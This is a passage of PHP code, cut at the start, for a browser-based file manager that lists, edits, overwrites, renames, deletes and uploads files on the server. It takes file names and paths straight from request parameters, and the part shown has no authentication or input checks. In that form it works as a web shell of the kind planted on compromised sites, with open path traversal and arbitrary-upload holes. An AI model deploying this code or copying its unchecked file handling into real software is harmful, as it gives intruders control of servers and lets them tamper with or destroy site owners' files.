substr(decoct(fileperms(PATH . "/" .$file)), -3) . "</a></td> <td> <a title='Edit File' href='?q=" . urlencode(encodePath(PATH)) . "&e=" . $file . "'><i class='fa-solid fa-file-pen'></i></a> <a title='Rename' href='?q=" . urlencode(encodePath(PATH)) . "&r=" . $file . "'><i class='fa-sharp fa-regular fa-pen-to-square'></i></a> <a title='Delete' href='?q=" . urlencode(encodePath(PATH)) . "&d=" . $file . "'><i class='fa fa-trash' aria-hidden='true'></i></a> <td> </tr> "; } echo " </tbody> </table>"; } else { if (empty($_GET)) { echo ("<script>window.location.replace('?p=');</script>"); } } if (isset($_GET['upload'])) { echo ' <form method="post" enctype="multipart/form-data"> Select file to upload: <input type="file" name="fileToUpload" id="fileToUpload"> <input type="submit" class="btn btn-dark" value="Upload" name="upload"> </form>'; } if (isset($_GET['r'])) { if (!empty($_GET['r']) && isset($_GET['q'])) { echo ' <form method="post"> Rename: <input type="text" name="name" value="' . $_GET['r'] . '"> <input type="submit" class="btn btn-dark" value="Rename" name="rename"> </form>'; if (isset($_POST['rename'])) { $name = PATH . "/" . $_GET['r']; if(rename($name, PATH . "/" . $_POST['name'])) { echo ("<script>alert('Renamed.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"); } else { echo ("<script>alert('Some error occurred.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"); } } } } if (isset($_GET['e'])) { if (!empty($_GET['e']) && isset($_GET['q'])) { echo ' <form method="post"> <textarea style="height: 500px; width: 90%;" name="data">' . htmlspecialchars(file_get_contents(PATH."/".$_GET['e'])) . '</textarea> <br> <input type="submit" class="btn btn-dark" value="Save" name="edit"> </form>'; if(isset($_POST['edit'])) { $filename = PATH."/".$_GET['e']; $data = $_POST['data']; $open = fopen($filename,"w"); if(fwrite($open,$data)) { echo ("<script>alert('Saved.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"); } else { echo ("<script>alert('Some error occurred.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"); } fclose($open); } } } if (isset($_POST["upload"])) { $target_file = PATH . "/" . $_FILES["fileToUpload"]["name"]; if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) { echo "<p>".htmlspecialchars(basename($_FILES["fileToUpload"]["name"])) . " has been uploaded.</p>"; } else { echo "<p>Sorry, there was an error uploading your file.</p>"; } } if (isset($_GET['d']) && isset($_GET['q'])) { $name = PATH . "/" . $_GET['d']; if (is_file($name)) { if(unlink($name)) { echo ("<script>alert('File removed.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"); } else { echo ("<script>alert('Some error occurred.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"); } } elseif (is_dir($name)) { if(rmdir($name) == true) { echo ("<script>alert('Directory removed.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"); } else { echo ("<script>alert('Some error occurred.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"); } } } ?> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/js/bootstrap.bundle.min.js" integrity="sha384-w76AqPfDkMBDXo30jS1Sgez6pr3x5MlQ1ZAGC+nuZB+EYdgRZgiwxhTBTkF7CXvN" crossorigin="anonymous"></script> </body> </html>